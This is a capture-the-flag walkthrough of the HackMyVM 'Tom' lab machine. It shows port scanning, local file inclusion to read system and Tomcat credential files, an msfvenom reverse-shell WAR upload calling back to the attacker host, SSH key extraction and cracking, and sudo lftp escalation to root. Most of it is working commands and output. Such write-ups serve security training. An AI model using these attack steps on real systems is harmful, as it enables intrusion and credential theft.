HackMyVm Tom Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Tom
Key points: tomcat configuration and upload
Scan ports.
~ nmap -sV -sC -p- -Pn 192.168.56.100 -oN ports.log
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-16 09:56 CST
Nmap scan report for deathnote.vuln (192.168.56.100)
Host is up (0.00073s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 55:5f:3f:15:c7:cb:5f:09:d6:a1:f5:70:06:d0:dd:bc (RSA)
| 256 ec:db:41:19:b8:60:bc:53:6f:c7:ef:c6:d3:ee:b9:b8 (ECDSA)
|_ 256 2e:0d:03:27:a5:2a:0b:4e:b0:6a:42:01:57:fd:a9:9f (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
8080/tcp open http Apache Tomcat 9.0.54
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.54
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
<!--more-->
Enum port 80.
/index.html (Status: 200) [Size: 10701]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/tomcat.php (Status: 200) [Size: 0]
Fuzz tomcat.php.
```bash
~ wfuzz -u 'http://192.168.56.100/tomcat.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000007570: 200 27 L 39 W 1441 Ch "filez"
Get /etc/passwd.
```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/passwd';
root:x:0:0:root:/root:/bin/bash
...
nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
...
tomcat:x:1001:1001::/opt/tomcat:/bin/false
We need to get home dir of tomcat.
```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/systemd/system/tomcat.service' fish-0 | 0 [10:29:59]
[Unit]
Description=Tomcat 9 servlet container
After=network.target
[Service]
Type=forking
User=tomcat
Group=tomcat
Environment="JAVA_HOME=/usr/lib/jvm/default-java"
Environment="JAVA_OPTS=-Djava.security.egd=file:///dev/urandom"
Environment="CATALINA_BASE=/opt/tomcat/latest"
Environment="CATALINA_HOME=/opt/tomcat/latest"
Environment="CATALINA_PID=/opt/tomcat/latest/temp/tomcat.pid"
Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"
ExecStart=/opt/tomcat/latest/bin/startup.sh
ExecStop=/opt/tomcat/latest/bin/shutdown.sh
[Install]
WantedBy=multi-user.target
Check password file at tomcat HOME dir.
```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml';
...
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="sml" password="H4ckMyP4$$w0rD!!!" roles="admin-gui,manager-script"/>
</tomcat-users>
Generate reverse shell for tomcat and upload.
```bash
~ msfvenom -p java/shell_reverse_tcp lhost=192.168.56.150 lport=1234 -f war -o rev.war
Payload size: 13323 bytes
Final size of war file: 13323 bytes
Saved as: rev.war
~ curl --upload-file rev.war -u 'sml:H4ckMyP4$$w0rD!!!' 'http://192.168.56.100:8080/manager/text/deploy?path=/upload'
OK - Desplegada aplicación en trayectoria de contexto [/upload]
Get reverse shell.
```bash
~ curl 'http://192.168.56.100:8080/upload/rev.war';
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234 fish-0 | 0 [10:48:06]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:52234.
id
uid=1001(tomcat) gid=1001(tomcat) grupos=1001(tomcat)
Check sudo -l.
```bash
tomcat@tom:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for tomcat on tom:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tomcat may run the following commands on tom:
(nathan) NOPASSWD: /usr/bin/ascii85
Read id_rsa of user nathan.
```bash
sudo -u nathan /usr/bin/ascii85 /home/nathan/.ssh/id_rsa -w 0
<~/M/P+/ODlr8PUC+;aDO&;FsnT<(.p&79M2o/M/O]:i^Ja/Q@"7ANCqj/4E<$;HZgq777JN78#4(DJ!fJ+@JXs/O`&r1G(s\6S()K2Dm...
Decode ascii85 online, then get id_rsa.
```bash
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,5065755920B77C45
pbcIb9gxpAhVFNik1U4P7SK+WnXji8QFUh11KM0oL8TXesjh+eRNlkHuYBvmm7rI
...
Decrypt id_rsa.
```bash
~ /usr/share/john/ssh2john.py id_rsa > hash
~ john --wordlist=/usr/share/wordlists/rockyou.txt hash bash-0 | 1 [11:08:11]
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
darkness (id_rsa)
1g 0:00:00:29 81.06% (ETA: 11:09:00) 0.03336g/s 387097p/s 387097c/s 387097C/s 9405es..9405872
Session aborted
Login ssh as usr nathan, check sudo -l.
```bash
~ ssh nathan@192.168.56.100 -i id_rsa john-0 | 1 [11:08:54]
Enter passphrase for key 'id_rsa':
Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
/usr/bin/xauth: file /home/nathan/.Xauthority does not exist
nathan@tom:~$ sudo -l
Matching Defaults entries for nathan on tom:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User nathan may run the following commands on tom:
(root) NOPASSWD: /usr/bin/lftp
Get root.
nathan@tom:~$ sudo lftp
lftp :~> !id
uid=0(root) gid=0(root) grupos=0(root)
lftp :~> !bash
root@tom:/home/nathan# id;hostname
uid=0(root) gid=0(root) grupos=0(root)
tom
root@tom:/home/nathan#